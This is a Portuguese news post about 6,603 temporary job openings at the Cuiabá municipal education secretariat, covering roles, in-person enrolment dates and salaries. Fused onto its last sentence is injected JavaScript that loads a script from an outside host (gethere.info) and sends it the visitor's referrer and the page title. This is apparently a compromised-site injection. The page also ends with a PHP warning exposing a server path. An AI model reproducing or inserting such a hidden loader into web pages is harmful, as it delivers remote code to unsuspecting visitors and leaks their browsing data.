MT: 6.603 vagas temporárias para a SME de Cuiabá

A Secretaria Municipal de Educação de Cuiabá, no Mato Grosso, publicou edital com 6.603 oportunidades temporárias para candidatos de níveis médio, médio/técnico e superior.

As vagas de nível médio são de técnico em administração escolar (24), técnico em nutrição escolar (493), técnico em manutenção e infraestrutura nas áreas de serviços gerais (997), vigilante (537) e motorista (21), técnico em multimeios didáticos (13) e cuidador de aluno com deficiência (1.040). As vagas de nível médio/técnico são de técnico em desenvolvimento infantil (1.356).

Quem finalizou o nível superior se candidata para as funções de  professor (2.043) e técnico de nível superior (79).

A inscrição para o concurso deverá ser realizada presencialmente em uma das unidades educacionais ou na sede da Secretaria Municipal de Educação de Cuiabá, entre os dias 20 e 30 de janeiro. Não há taxa de participação.

A avaliação dos candidatos se dará por meio de contagem de pontos, com base nos requisitos de titulação, formação continuada e experiência profissional.

O salário dos aprovados varia entre R$ 977,93 e R$ 2.909,90, de acordo com o cargo.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *


Warning: call_user_func_array() expects parameter 1 to be a valid callback, class 'livehelperchat' does not have a method 'wp_footer' in /home/clube/public_html/wp-includes/class-wp-hook.php on line 298